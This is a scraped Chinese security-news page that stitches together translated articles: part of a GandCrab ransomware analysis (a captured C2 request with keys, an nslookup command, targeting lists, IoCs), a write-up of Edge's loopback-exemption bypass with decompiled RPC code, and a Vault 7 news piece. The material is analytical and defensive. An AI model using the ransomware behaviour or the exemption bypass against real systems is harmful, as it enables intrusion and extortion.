action=call&ip=99.8.160.100&pc_user=virusLab&pc_name=VIRUSLAB-PC&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 7 Enterprise&os_bit=x64&ransom_id=c9ed65de824663fc&hdd=C:FIXED_64317550592/50065174528&pub_key=BgIAAACkAABSU0ExAAgAAAEAAQCn7L3iSUPhEdoSEOAlWaqDdzX8PknIO2w9kc//lm7YRf6KWCDmy5GrmWriBOxYZpUFjC9+xhltJLVfxJoBPTv7MU6sJQeMDmxXTMAjJDrrV5cXefhic2utsglgu7eaz/lbaLjBRAf1Xj4G/sI1z5mCKSg3G+ZRKWwLh4n5kCb3zNp1xEah4zAJwGrLXsuHjkDvTH4CrugGatck/A5A6mnNbY0kkm5TL9Jp0qLzl1Rj69nHvZ5BGZHxa9bKrZ4O0wugU1CEh21JTEnSO46A93818dengQ+QBECsS3ztN3GKsfqEMzP7Yu4Eo8eaRyxkZJU9NKXMEm7kgUDmfwMCxFfW
&priv_key=BwIAAACkAABSU0EyAAgAAAEAAQCn7L3iSUPhEdoSEOAlWaqDdzX8PknIO2w9kc//lm7YRf6KWCDmy5GrmWriBOxYZpUFjC9+xhltJLVfxJoBPTv7MU6sJQeMDmxXTMAjJDrrV5cXefhic2utsglgu7eaz/lbaLjBRAf1Xj4G/sI1z5mCKSg3G+ZRKWwLh4n5kCb3zNp1xEah4zAJwGrLXsuHjkDvTH4CrugGatck/A5A6mnNbY0kkm5TL9Jp0qLzl1Rj69nHvZ5BGZHxa9bKrZ4O0wugU1CEh21JTEnSO46A93818dengQ+QBECsS3ztN3GKsfqEMzP7Yu4Eo8eaRyxkZJU9NKXMEm7kgUDmfwMCxFfWGRZmQmHH5W5K1RYgSg8VJEFLebRW8+o7X0K30wzzrw5NHpJpVJYX8OKot8KvopS4wsZzuxu5YJih1ZYVgF6QT5FW4WEG3BzMtq5vGVqTmrlckudC0xfGlGb7J41vUkZsp6S07NTIIT7HtYJSA/pxS51Zg+13TfU0nxC92RkKuva/8Dzmgssm6uE7aYJQFEkUmkPImYreHGIPsffEEGtZM9zwz4tXbrXLch0BoRNHeR+GFLJclnLc5JMg/J4BLaS6js+RGxRbZGMPJDVX6lTEEl+aIYO38Wh49+Zcpzs4EOUfb1EsoLEDAZbppIWq8Yr1P6KtWkqIXRzjUk9HXiJm3qHm0u0vchV4iRAKz2MJ/xZdYjHp+C3qMTTsNbQbtcscpy13/rEv8oO6clfciSCPcthy5IkLFLKZQP5be+IcsAjxeSoOqqtEpNpj8nOKfZ5PvEs+/kn718vG0R5CMU4I0fyF0BD68AFat6dl5gHK1sKs0ndAvCKdDMg/HqO/JKUZRSza2VKkgxpXC57BRGNP0r/jYySGnqhE2owHQaXoEmP9tme1A8PHsAoNtUEd0SO4/pn4hDg70o/Nmph/UWqtOq9nSlrxQMD8Q08w4K2H1CC3eCAnHZOM8PTCDYH3nh6f/ftkVtyrpudTpicTjoUSEkwtEPRsWk7ff3F/Na8D2FcXSI5xQ6R+R2uy8GvVoxpBy8Xdh78VqViOBlu5+Jxp09PMQmI2EFususg4VJeH047Wayi2r+VemzAX1rTuMh2mRKfKa+eae+YBKjBUkIh9WPCmFjO+3lll7GqV7P4JFm1g2sjrm/dPWnoGzfg1E7brER6aD2q+w1+4o8wCzNTNvPH2bwPMyV6R+vbWOVZUTprzZ4sRr7KxT0ucZmNA76WX39NegSU56tOngYpAQprOMrJP0NYmrizT8FsCOcqlUGk0jf6moarJSWQxh2MxXtlpFAvJjPTqqKruIVMhIkTJ9aZHKnn02a5PIdLcs4a09D85js9klKZn90Gj6C4AxlT2nI/ba9mEx+7srvxxbh1XNgI987IWLsLYpWxHlRptJqIvI0ZAA3EuvwZuZ8f6sqLM2/rSxdOnFW5hd8am9zgopimktfkjFtsHpev/Svf0VlxQ3Fj22A06aXqfi7hmWPZ8ZCtZ874PUHgbrG3foNESQiTghT2NLV9rNNad7ij/kVA=
&version=1.0
密钥转化为base64编码的函数段如下:

将编码后的密钥添加到请求字符串中(私钥存放于priv_key参数中):

此时,我们已经清楚恶意软件会将哪些信息发往C2服务器。这些信息非常有趣,因为我们有可能从内存中提取出加密密钥,然后使用这些密钥来解密文件。我们会继续调查,如果有新发现会及时更新分析文章。

GandCrab的服务器托管在.bit域名上,因此恶意软件必须查询支持该TLD的域名服务器,恶意软件采用如下命令来查询相关域名:

nslookup [insert domain] a.dnspod.com.
这条命令会查询a.dnspod.com域名服务器,该服务器支持以下.bit类型的TLD:

bleepingcomputer.bit
nomoreransom.bit
esetnod32.bit
emsisoft.bit
gandcrab.bit
恶意软件创建管道,通过该管道打开NSlookup子进程。这样一来,子进程就可以直接影响父进程的内存,无需手动传输输出结果。这是一种比较有趣又实用的技术,相关代码如下所示:

准备就绪后,恶意软件尝试向服务器发送数据,如果出现错误或者服务器不可达,则会在无限循环中继续执行该过程,直到找到可用的服务器为止,然后重新查询客户端IP,再次运行nslookup,解析IP地址。除非恶意软件与服务器建立连接,否则它将继续运行,直至进程被手动结束为止。

前面我们提到过,除非恶意软件找到可用的服务器,才会进入加密过程,也就是说恶意软件会进入一个死循环中,查询IP地址:

找到可用地址后,恶意软件继续打开一个线程,启动主加密流程。然而,在执行加密过程之前,恶意软件会打开另一个线程,创建一个窗口,将其标记为Firefox。窗口加载时,会将自身拷贝至temp目录中,并在注册表中建立相应键值。这也是这款恶意软件为数不多的没有直接用明文表示的动作之一。恶意软件调用cryptGenRandom函数,将输出结果应用在一组字符串上,从而随机生成复制文件的文件名。

以上功能有点奇怪,虽然恶意软件会通过上述流程实现本地持久化目的,但同时也会第一时间创建一个窗口。从我们的角度来看,创建窗口对其本身任务而言没有任何好处。作者这么做可能只是想实验一下,真实的意图我们仍然不得而知。

4.3 加密行为
如前文所述,恶意软件所使用的加密算法为RSA算法。在进入加密流程之前,恶意软件首先确保自己没有加密特定类型的文件,这些文件类型已硬编码到恶意软件中,如下所示:

desktop.ini
autorun.inf
ntuser.dat
iconcache.db
bootsect.bak
boot.ini
ntuser.dat
thumbs.db
GDCB-DECRYPT.txt
.sql
如果恶意软件发现目标文件名在该列表中出现,则会跳过此文件,继续处理下一个文件。与此同时,如果待处理的目录属于如下几个关键目录,也会被恶意软件跳过:

local app data
windows
programfiles
program data
ransomware
localsettings
通过这些检查过程后,恶意软件会对文件扩展名做最后一次检查,检查该类型的文件是否可以加密处理,可以处理的扩展名如下:

如果所有检查过程都通过,恶意软件会使用之前生成的密钥,配合盐(salt)以及生成的随机数来加密文件,并将文件重命名为.GDCB类型。循环加密过程是一个递归函数,可以处理磁盘上的所有文件。

五、防护手段
借助漏洞利用防护功能,Malwarebytes能够保护客户免于感染这款恶意软件,由于采用了强大的反勒索软件引擎,客户能够防范于未然,在看到恶意软件之前就能主动阻止其攻击活动。

六、总结
在当前活跃的攻击活动中看到新型勒索软件的踪影是非常有趣的一件事情,此外,更有趣的是有两款不同的漏洞利用工具包在传播这款软件。我们不知道这两种攻击活动背后的主使者是否为同一波人,正在尝试使用不同的传播渠道来发起攻击。

七、IoC
Seamless gate

31.31.196.187,xn--80abmi5aecft.xn--p1acf
GrandSoft EK(IP)

62.109.4.135
GandCrab(封装形态)

69f55139df165bea1fcada0b0174d01240bc40bc21aac4b42992f2e0a0c2ea1d
GandCrab(解封装形态)

ab0819ae61ecbaa87d893aa239dc82d971cfcce2d44b5bebb4c45e66bb32ec51
本文翻译自 blog.malwarebytes.com, 原文链接 。如若转载请注明出处。
勒索软件 GandCrab RIG

興趣使然的小胃 认证 分享到: QQ空间 新浪微博 微信 QQ facebook twitter
|推荐阅读

ETW注册表监控windows内核实现原理
2019-02-21 14:30:47

WordPress 5.0.0远程代码执行漏洞分析
2019-02-21 11:30:53

Lucky双平台勒索者解密分析
2019-02-21 10:45:27

off by null漏洞getshell示例
2019-02-20 16:59:40
|发表评论
发表你的评论吧
昵称
大表哥
换一个
|评论列表
还没有评论呢,快去抢个沙发吧~
興趣使然的小胃
肥叶好香锅,孜孜不倦
文章
334
粉丝
55
TA的文章
WordPress 5.0.0远程代码执行漏洞分析
2019-02-21 11:30:53
RSAC创新沙盒2019:云、身份、应用安全成为焦点
2019-02-20 16:00:59
Dirty Sock:Ubuntu提权漏洞分析
2019-02-14 11:00:09
Chrome扩展在持久化中的应用
2019-02-14 10:30:31
Foxit Reader SDK ActiveX漏洞分析
2019-02-13 15:30:20
输入关键字搜索内容
相关文章
勒索软件 Jaff 深入分析
GandCrab 5.1样本详细分析
警惕GarrantyDecrypt勒索病毒最新变种NOSTRO加密全部文件
2018年12月勒索病毒疫情分析
国内企业遭遇勒索软件攻击事件及相关样本分析
对UNNAMED1989勒索病毒的传播及代码的相关分析
GandCrab传播新动向——五毒俱全的蠕虫病毒技术分析V1.1
热门推荐
文章目录
一、前言
二、传播渠道
2.1 RIG Exloit Kit
2.2 GrandSoft Exploit Kit
三、整体情况
四、技术分析
4.1 初始化
4.2 网络行为
4.3 加密行为
五、防护手段
六、总结
七、IoC
安全客Logo
安全客
安全客
关于我们
加入我们
联系我们
用户协议
商务合作
合作内容
联系方式
友情链接
内容须知
投稿须知
转载须知
合作单位
安全客
安全客
Copyright © 360网络攻防实验室 All Rights Reserved 京ICP备08010314号-66
Loading…0daybank

edge上网

edge上网
首页
文章

漏洞
SRC导航
内容精选

输入关键词搜索

APP 登录| 注册
Edge与localhost网络隔离
阅读量 75420 | 稿费 160

分享到: QQ空间 新浪微博 微信 QQ facebook twitter
发布时间:2018-07-26 14:00:35
译文声明
本文是翻译文章,文章原作者,文章来源:tyranidslair.blogspot.com
原文地址:https://tyranidslair.blogspot.com/2018/07/uwp-localhost-network-isolation-and-edge.html

译文仅供参考,具体内容表达以及含义原文为准

×

一、前言
本文介绍了Windows中新增的一个有趣的“功能”,该功能支持Edge浏览器访问本地环回(loopback)网络接口。本文已在Windows 10 1803(Edge 42.17134.1.0 )以及Windows 10 RS5 17713(Edge 43.17713.1000.0 )上验证通过。

二、具体分析
我非常喜欢微软从Windows 8开始引入的App Container(AC)沙盒概念。该机制将Windows上的沙盒环境从受限令牌(非常难以理解并需要耗费大量精力的东西)迁移到了一个基于功能(capability)的合理模型上,此时除非我们在应用启动时显式赋予了各种功能,否则就会受到种种限制。在Windows 8上,沙盒中只能访问已知的一小部分功能。在Windows 10上,受限范围已大大扩展,应用程序可以定义自己的功能,并且通过Windows访问控制机制来访问这些功能。

我一直在关注AC及其在网络隔离方面的能力,在AC中,若要访问网络,则需要赋予“internetClient”之类的功能。很少有人知道,即便处于非常受限的令牌沙盒中,我们也可以访问raw AFD驱动来打开网络套接字。AC已经非常顺利地解决了这个问题,它并没有阻止我们访问AFD驱动,而是让防火墙检查程序是否具备对应的功能,据此阻止连接请求或者接受套接字。

在构建通用沙盒机制的过程中,这种AC网络隔离原语会碰到一个问题,那就是无论我们赋予AC应用什么功能,它都无法访问localhost网络。比如,在测试过程中,我们可能希望沙盒应用能够访问托管在本地的一个web服务器,或者使用本地代理以MITM方式监听流量。这些场景都无法适用于只具备相应功能的AC沙盒。

之所以阻止沙盒访问localhost,很大程度上是因为潜在的安全风险问题。Windows在本地运行了许多服务(如SMB服务器),这些服务很容易被滥用。其实防火墙服务中存储了一个不受localhost限制的软件包列表,我们可以使用防火墙API(如NetworkIsolationSetAppContainerConfig函数)或者使用Windows中内置的CheckNetIsolation工具来访问或者修改这一列表。这种方式听起来比较合理,因为访问loopback接口是开发者会去尝试的选项,正常应用一般不会依赖这一点。我比较好奇的是这个豁免列表中是否已经存在一些AC,大家可以执行CheckNetIsolation LoopbackExempt -s命令列出本地系统中不受限制的那些AC。

在我的Windows 10主机上,该列表中共有2个条目,应该没有应用会使用这种开发者功能,这一点比较奇怪。第一个条目的名称为AppContainer NOT FOUND,表示已注册的SID与已注册的AC不匹配。第二个条目的使用了看起来毫无意义的名称001,这至少表明这是当前系统上的一个应用程序。这究竟是怎么回事?我们可以使用我的NtObjectManager PS模块,根据对应的SID值,通过Get-NtSid cmdlet来分析001这个名字是否可以解析成更容易理解的名称。

水落石出,001实际上是Edge的一个子AC,我们可以根据SID的长度来猜测。正常的AC SID具备8个子项,而子AC则具备12个子项(基础AC SID后附加4个子项)。回过头来看这个未注册的SID,我们可以发现它是一个Edge AC SID,并且带有尚未注册的子项。001这个AC貌似是用于托管Internet内容的AC(我们可以参考X41Sec关于浏览器安全白皮书的第54页来验证这一点)。

这一点并不奇怪。Edge刚发布时并不能访问localhost资源(比如,IBM在一份帮助文档中指导用户如何使用CheckNetIsolation来添加例外)。然而,在某个研发阶段中,微软添加了一个about:flags选项,允许Edge访问localhost资源,现在这个选项看起来已经变成默认配置,如下图所示(微软仍友情提示启用该选项可能使用户设备面临安全风险):

比较有趣的是,如果我们禁用这个选项并重启Edge,那么该例外条目就会自动被清除,而再次启用该选项又会自动恢复这个例外条目。为什么这一点比较有趣?这是因为根据以往的经验(比如Eric Lawrence写的这篇文章),我们需要管理员权限才能修改这个例外列表,也许微软现在修改了这个规则?我们可以验证这个猜测是否准确,使用CheckNetIsolation工具,传入-a -p=SID参数,具体命令如下:

因此,我猜测开发者并没有使用CheckNetIsolation工具来添加例外规则,现在这种情况真的让我很感兴趣。由于Edge是操作系统内置的应用,因此微软很有可能添加了一些“安全”检测机制,允许Edge将自己加入例外列表,但具体位置在哪呢?

最简单的一种方法就是利用实现了NetworkIsolationSetAppContainerConfig的RPC服务(我反汇编了这个API,因此知道有这样一个RPC服务)。我凭直觉猜测具体实现应该托管于“Windows Defender Firewall”服务中,该服务由MPSSVC DLL负责实现。如下代码为RPC服务器对该API的简化版实现代码:

HRESULT RPC_NetworkIsolationSetAppContainerConfig(handle_t handle,
DWORD dwNumPublicAppCs,
PSID_AND_ATTRIBUTES appContainerSids) {

if (!FwRpcAPIsIsPackageAccessGranted(handle)) {
HRESULT hr;
BOOL developer_mode = FALSE:
IsDeveloperModeEnabled(&developer_mode);
if (developer_mode) {
hr = FwRpcAPIsSecModeAccessCheckForClient(1, handle);
if (FAILED(hr)) {
return hr;
}
}
else
{
hr = FwRpcAPIsSecModeAccessCheckForClient(2, handle);
if (FAILED(hr)) {
return hr;
}
}
}
return FwMoneisAppContainerSetConfig(dwNumPublicAppCs,
appContainerSids);
}
如上所示,代码中有个FwRpcAPIsIsPackageAccessGranted函数,函数名中包含一个“Package”字符串,表示该函数可能会检查一些AC软件包信息。如果该函数调用成功,则会跳过代码中的安全检查过程,然后调用FwMoneisAppContainerSetConfig这个函数。需要注意的是,安全检查过程会根据是否处于开发者模式而有所不同,如果启用了开发者模式,我们还可以绕过管理员检查过程,根据这一点我们可以再次确认这种例外列表主要是为开发者而设计的一种特性。

接下来我们来看一下FwRpcAPIsIsPackageAccessGranted的具体实现:

const WCHAR* allowedPackageFamilies[] = {
L”Microsoft.MicrosoftEdge_8wekyb3d8bbwe”,
L”Microsoft.MicrosoftEdgeBeta_8wekyb3d8bbwe”,
L”Microsoft.zMicrosoftEdge_8wekyb3d8bbwe”
};

HRESULT FwRpcAPIsIsPackageAccessGranted(handle_t handle) {
HANDLE token;
FwRpcAPIsGetAccessTokenFromClientBinding(handle, &token);

WCHAR* package_id;
RtlQueryPackageIdentity(token, &package_id);
WCHAR family_name[0x100];
PackageFamilyNameFromFullName(package_id, family_name)

for (int i = 0;
i < _countof(allowedPackageFamilies); ++i) { if (wcsicmp(family_name, allowedPackageFamilies[i]) == 0) { return S_OK; } } return E_FAIL; } FwRpcAPIsIsPackageAccessGranted函数会获取调用者的token信息,查询软件包的Family Name,将该名称与硬编码的列表进行对比。如果调用者位于Edge包(或者某些beta版本)中,则返回成功,使上层函数跳过admin检查过程。这就能解释Edge如何将自己加入例外列表中,现在我们还需要知道需要哪些访问权限才能使用RPC服务器。对ALPC服务器来说存在两项安全检查,分别为连接到ALPC的端口以及一个可选的安全回调例程。我们可以选择逆向分析该服务所对应的二进制程序,但还可以选择更加简单的方法,从ALPC服务器端口进行转储,这一次我们还可以使用我的NtObjectManager模块。 由于RPC服务并没有指定服务的名称,因此RPC库会生成一个随机的名称,格式为LRPC-XXXXX。我们通常可以使用EPMAPPER来寻找实际名称,但我在CheckNetIsolation的NtAlpcConnectPort上设置了断点,导出连接名。然后我们就可以在服务进程中找到ALPC端口的句柄,导出安全描述符。该列表中包含Everyone以及所有的网络相关功能,因此具备网络访问权限的任何AC进程都可以与这些API交互(包括Edge LPAC在内)。因此所有的Edge进程都可以访问这个功能,添加任意包。Edge中的具体实现位于emodel!SetACLoopbackExemptions函数中。 了解这些知识后,现在我们将代码汇总起来,利用这个“功能”来添加任意例外条目。大家可以访问我的Github来下载这个PowerShell脚本。 三、总结 我猜测微软之所以采用这种方式来添加localhost访问权限,原因在于这样就不需要去修改内核驱动,只需要在用户模式组件上进行修改。但我有点愤愤不平,这样让Edge在地位上比其他浏览器有所不同。从道理上讲,即便封装了Edge,其他应用也不应该具备添加localhost例外的能力。如果微软能在未来添加相应的功能那再好不过,不过由于目前RS5仍然采用的是这种办法,我对此并不乐观。 这是不是一种安全问题呢?得具体情况具体分析。你可以认为在默认配置下能够访问localhost资源本身就是一种危险行为,但微软又在about:flags页面中明确给出了安全风险提示。另一方面所有的浏览器都支持这种功能,所以我也不确定这是不是真的属于安全风险。 具体的实现代码非常粗糙,我惊讶的是这种代码竟能够通过安全审查。这里我们可以列出存在的一些问题: 1、软件包的family检查过程不是特别严格,与RPC服务较弱的权限结合起来后,我们就可以让任意Edge进程具备添加例外的能力; 2、例外范围并没有与调用进程关联起来,因此任意SID都可以添加到例外中。 默认情况,只有面向Internet的AC才能够访问localhost,比如,如果我们攻破了Flash进程(为子AC “006”),那么就可以将自身加入例外列表中,进一步尝试攻击在localhost监听的服务。如果只有微软Edge进程而不是任何进程能够添加例外列表那就更好一些,但最好的还是通过正规的功能来支持这一特性,而不是通过后门的方式来实现,这样每个人都可以利用这一特性。 本文翻译自 tyranidslair.blogspot.com, 原文链接 。如若转载请注明出处。 edge localhost 网络隔离 興趣使然的小胃 认证 分享到: QQ空间 新浪微博 微信 QQ facebook twitter |推荐阅读 ETW注册表监控windows内核实现原理 2019-02-21 14:30:47 WordPress 5.0.0远程代码执行漏洞分析 2019-02-21 11:30:53 Lucky双平台勒索者解密分析 2019-02-21 10:45:27 off by null漏洞getshell示例 2019-02-20 16:59:40 |发表评论 发表你的评论吧 昵称 神奇小子 换一个 |评论列表 还没有评论呢,快去抢个沙发吧~ 興趣使然的小胃 肥叶好香锅,孜孜不倦 文章 334 粉丝 55 TA的文章 WordPress 5.0.0远程代码执行漏洞分析 2019-02-21 11:30:53 RSAC创新沙盒2019:云、身份、应用安全成为焦点 2019-02-20 16:00:59 Dirty Sock:Ubuntu提权漏洞分析 2019-02-14 11:00:09 Chrome扩展在持久化中的应用 2019-02-14 10:30:31 Foxit Reader SDK ActiveX漏洞分析 2019-02-13 15:30:20 输入关键字搜索内容 相关文章 ETW注册表监控windows内核实现原理 WordPress 5.0.0远程代码执行漏洞分析 Lucky双平台勒索者解密分析 off by null漏洞getshell示例 热门推荐 文章目录 一、前言 二、具体分析 三、总结 安全客Logo 安全客 安全客 关于我们 加入我们 联系我们 用户协议 商务合作 合作内容 联系方式 友情链接 内容须知 投稿须知 转载须知 合作单位 安全客 安全客 Copyright © 360网络攻防实验室 All Rights Reserved 京ICP备08010314号-66 Loading...0daybank

维基解密事件

维基解密事件
首页
文章

漏洞
SRC导航
内容精选

输入关键词搜索

APP 登录| 注册
【国际资讯】维基解密CIA绝密文件泄露事件,不得不说的10件事
阅读量 56542 | 稿费 260

分享到: QQ空间 新浪微博 微信 QQ facebook twitter
发布时间:2017-03-10 14:48:21
译文声明
本文是翻译文章,文章原作者,文章来源:thehackernews.com
原文地址:http://thehackernews.com/2017/03/wikileaks-cia-vault7-leak.html

译文仅供参考,具体内容表达以及含义原文为准

×
http://p6.qhimg.com/t01c3fee8b65b614175.png

翻译:WisFree

预估稿费:260RMB

投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿

前言

就在昨天,维基解密(WiKiLeaks)公布了数千份文档并揭秘了美国中央情报局关于黑客入侵技术的最高机密,根据泄密文档中记录的内容,该组织不仅能够入侵iPhone手机、Android手机和智能电视,而且连Windows、Mac和Linux操作系统也难逃他们的“魔掌”。

外界将此次泄漏事件取名为Vault 7,Vault 7公布的机密文件记录的是美国中央情报局(CIA)所进行的全球性黑客攻击活动,而Vault 7仅仅是该系列(该系列代号为“Year Zero”)的第一部分,维基解密还将会在接下来的几天里陆续公布剩下的机密文档。

根据维基解密提供的信息,美国中央情报局在发现了产品中的安全漏洞之后,并不会将漏洞上报给相应厂商,而是直接利用这些漏洞来入侵用户的软件或硬件,例如iPhone手机、Android手机和三星智能电视等等,而这些东西都是全球数百万用户每天都可能会使用到的东西。

http://p2.qhimg.com/t01f46b764b755a59e5.png

其中的一份泄密文件还暗示称,美国中央情报局甚至还在寻找能够远程控制智能汽车的黑客工具,因为这些工具可以让CIA的特工们给目标车辆带来“意外事件”,而通过远程黑客工具来实现的话不仅效率高,而且基本上是无法被检测到的。

很多安全研究专家、企业、以及非营利性组织目前仍在对Vault 7的这8761份机密文档进行分析,因此我们将在这篇文章中跟大家讨论一下一些与Vault 7相关的内容。

No.1:维基解密曝光了CIA的移动端攻击技术

Vault7-美国中央情报局有一大堆令人印象深刻的攻击方法来入侵你的iOS、Android以及Windows手机。

http://p8.qhimg.com/t01f6ba63fa9e32a0a3.png

据称,Vault7包含8761份机密文档及文件,这些文件记录了CIA针对Android以及苹果智能手机所研发的入侵破解技术细节,其中有些技术甚至还可以拿到目标设备的完整控制权。维基解密认为,美国中央情报局的移动研发部门旗下还有一个非常复杂的团队,这个团队专门负责研究0 day漏洞的利用技术并开发相应的恶意软件,而这些恶意软件不仅能够从iPhone以及类似iPads这样的运行了iOS系统的苹果产品中窃取数据,它们甚至还可以完全接管iOS设备。

根据曝光文件透露的信息,其中的某些攻击技术甚至强大到允许攻击者远程接管目标设备idea内核,也就是负责控制智能手机运行的操作系统核心部分,有的还可以获取到设备的root访问权,攻击者可以通过这种权限获取到目标设备的地理位置、通信以及联系人等信息。这种类型的攻击技术主要使用于某些有针对性的攻击活动,而不是用来进行大规模监控的。泄密文档还曝光了美国中央情报局所能进行的一些特殊攻击,入侵最新版本的iOS和Android系统其实也不在话下。

No.2:CIA并不会去破解加密App,而是直接绕过它们

Vault7-美国中央情报局研发的恶意软件可以在没有破解加密算法的情况下直接读取你的隐私聊天信息。

http://p0.qhimg.com/t0193f80a78df0d77b6.png

维基解密在一份声明中指出:

“CIA首先会入侵目标智能手机,然后在语音以及文字消息被加密之前收集到原始的消息内容,所以他们实际上是绕过了主流安全通信软件的加密保护,受影响的产品包括WhatsApp、Signal、Telegram、Confide和Cloakman在内。”

虽然笔者认为这份声明所说的内容没毛病,但就在维基解密公布了这份声明的几个小时之后,仍然很多人对文件中的机密内容产生了错误的认知,因为很多人认为美国中央情报局已经能够破解类似Signal和WhatsApp这种主流安全聊天软件所使用的加密算法了,而事实并非如此。

实际上,美国中央情报局有一款能够获取目标手机完整访问权的黑客工具,它之所以能够“绕过”加密信息App,是因为它能够让手机中的安全系统完全失效,并允许CIA的特工远程访问到目标手机。这就好比是你坐在目标用户的身后,然后在他与别人聊天的时候你在偷看他的内容一样,这并不意味着聊天软件就一定存在安全问题。这也就意味着,当你能够随时监控目标设备系统的一举一动时,那么信息在传输过程中是否被加密已经不重要了。

但是,维基解密此次曝光的文件没有透露针对Signal和WhatsApp的攻击技术细节,而只是透露了该组织能够远程劫持手机并在用户的隐私消息被加密和和发送之前获取到这些消息内容。

No.3:CIA研发了针对Windows、Linux和macOS操作系统的恶意软件

Vault 7-美国中央情报局海燕发了跨平台的恶意软件来入侵Windows、Linux以及macOS计算机。

维基解密此次泄漏的文件还包含了关于跨平台恶意软件的信息,美国中央情报局可以利用这种恶意软件来远程入侵和监控运行了Windows、macOS以及Linux操作系统的个人计算机。这也就意味着,CIA不仅能够绕过PGP邮件加密,而且甚至还能够绕过你的VPN,你在自己电脑上所进行的各种网络活动都可能随时处于监控之下,即使你使用了Tor浏览器。

http://p3.qhimg.com/t0106f4e329e3c28e05.png

同样的,这并不意味着PGP、VPN或Tor浏览器存在安全问题,也不意味着CIA能够破解这些服务。但是由于他们能够入侵并完全控制任意设备(例如智能手机、笔记本电脑或智能电视),所以他们能够绕过这些服务来监控目标设备上发生的所有用户行为。

No.4:CIA借鉴了其他恶意软件的代码

Vault 7-美国中央情报局借鉴了很多当前流行的恶意软件代码,并利用这些代码开发出了自己的间谍软件。

没错,美国中央情报局不仅自己会去研发新型的攻击技术,而且还会从其他开源的恶意软件借鉴代码。其中有一份文件提到了CIA如何从目前已知的恶意软件样本中借鉴代码,并且根据自己的需要对代码进行了自定义修改以满足其特殊的需求。维基解密曝光的文件显示:“UMBRAGE团队目前正在开发和维护的应用开发技术以及代码库从其他恶意软件中借鉴了大量代码,而这个代码库所提供的代码段能够迅速被整合并利用到有针对性的攻击活动中。”

No.5:CIA使用捆绑了恶意软件的App来监控目标

Vault 7:Fine Dining攻击:美国中央情报局会使用捆绑了恶意软件的App来监控目标。

泄露文档中包含一个名为“Fine Dinning”的文件,但其中并不包含任何的0 day漏洞利用技术,而是一堆捆绑了恶意软件的应用程序。

Fine Dining由CIA网络情报中心的下属部门OSB负责开发,Fine Dining是一种具有高度通用性的攻击技术,在经过特殊配置之后可以将其用于各种攻击场景,但是需要CIA的特工物理访问目标设备。CIA的特工会将这些捆绑了恶意软件的应用存储在U盘里面,然后再将他们插入目标设备并从中收集数据。

No.6:CIA极度渴望破解苹果的加密算法

Vault 7-美国中央情报局非常希望能够破解苹果设备所采用的加密算法,并且也为之努力多年了。

泄漏文件显示,美国中央情报局正在使用一些“物理性”以及“非入侵性”的技术来破解苹果设备中存储的关键安全密钥。不过除了CIA之外,美国联邦调查局(FBI)也在努力去发现和利用苹果设备中的漏洞。

http://p0.qhimg.com/t01d0fd9305611b11f7.png

No.7:苹果表示已经修复了此次泄漏文档所记录的大部分漏洞

Vault 7-苹果对外声称,他们已经将CIA泄密文档中披露的绝大多数iOS安全漏洞修复了。

除了Android和三星智能电视中的漏洞之外,泄密文档中还记载了14个iOS漏洞的详细信息,并且文档还描述了CIA如何利用这些安全问题来追踪和监视目标用户的通信数据。根据苹果公司提供的信息,维基解密此次泄漏的CIA机密文档中的大部分iOS漏洞已经在一月份发布的iOS最新版本中得到了修复,目前苹果的工程师们仍在修复剩下的安全漏洞。

No.8:不安全的物联网设备将允许CIA随时随地攻击任何人

Vault 7-美国中央情报局可以入侵你的智能电视和其他智能设备,并利用这些设备来监视你的一举一动。

除了能够攻击大量软件和服务的漏洞利用技术以及黑客工具之外,Vault 7还详细记录了一种名叫Weeping Angel的监控技术,美国中央情报局正在使用这种技术来渗透智能电视。经过测试发现,Weeping Angel可以用来入侵三星智能电视并让其进入一种“伪关机”模式,此时用户会以为电视处于关闭状态,但其实CIA正在用这台智能电视记录你的语音聊天信息。

No.9:维基解密此次泄漏的CIA机密文档其影响力弱于斯诺登的NSA泄密事件

Vault 7-跟NSA的TAO团队相比,CIA的能力肯定要弱一些,而Vault 7的影响力肯定也没有斯诺登泄密事件来得严重。

http://p7.qhimg.com/t01c5beb12e000780a6.png

泄漏文件中没有谈到针对智能手机和个人电脑的大规模监控活动,从技术层面上来说,NSA手上的技术远比CIA的要复杂和先进得多,而且NSA所拥有的安全技术人才也是CIA所不能相比的。

No.10:前中情局局长认为,维基解密此次曝光的文件会让美国变得更加不安全

Vault 7-前中情局局长认为,维基解密此次曝光的CIA机密文件毫无疑问会让大量美国公民的生命至于风险之中。

总结

Vault 7仅仅只是一个开始,维基解密还会陆续曝光剩下的CIA机密文件,随着“Year Zero”系列其余的部分逐渐揭开神秘面纱,人们将会知道更多政府和情报机构的那些不可告人的秘密。

本文翻译自 thehackernews.com, 原文链接 。如若转载请注明出处。
安全资讯

WisFree 分享到: QQ空间 新浪微博 微信 QQ facebook twitter
|推荐阅读

ETW注册表监控windows内核实现原理
2019-02-21 14:30:47

WordPress 5.0.0远程代码执行漏洞分析
2019-02-21 11:30:53

Lucky双平台勒索者解密分析
2019-02-21 10:45:27

off by null漏洞getshell示例
2019-02-20 16:59:40
|发表评论
发表你的评论吧
昵称
越南邻国宰相
换一个
|评论列表
还没有评论呢,快去抢个沙发吧~
WisFree
这个人太懒了,签名都懒得写一个
文章
450
粉丝
13
TA的文章
垃圾邮件服务,声称可以在任何地方“打印”任何东西
2018-12-06 11:31:26
黑掉5万多台打印机,只为推广他的YouTube频道?
2018-12-04 11:08:46
“丝绸之路”聘请的杀手在温哥华被捕
2018-11-26 11:16:15
FBI警告银行称:网络犯罪分子正计划对全球范围内的ATM实施攻击
2018-08-16 15:54:10
DiskShadow工具介绍:VSS绕过、持久化感染和活动目录数据库提取
2018-04-02 15:00:20
输入关键字搜索内容
相关文章
2月21日每日安全热点 – WinRAR中存在19年的代码执行漏洞
GitHub上发布后即登顶的老司机渗透教程,你的小本本备好了吗?
“高价收购私人微信号”的局中局
2月20日每日安全热点 – 社工妹子跟踪狂
2月19日每日安全热点 – APT-C-36: 针对哥伦比亚政府机构和公司的持续攻击
2月18日每日安全热点 – IDN Visual Security Deep Thinking
2月17日每日安全热点 – Facebook CSRF保护绕过,导致帐户接管
热门推荐
安全客Logo
安全客
安全客
关于我们
加入我们
联系我们
用户协议
商务合作
合作内容
联系方式
友情链接
内容须知
投稿须知
转载须知
合作单位
安全客
安全客
Copyright © 360网络攻防实验室 All Rights Reserved 京ICP备08010314号-66
Loading…0daybank

trojan downloader

trojan downloader
首页
文章

漏洞
SRC导航
内容精选

输入关键词搜索

APP 登录| 注册
TrojanDownloader病毒分析报告
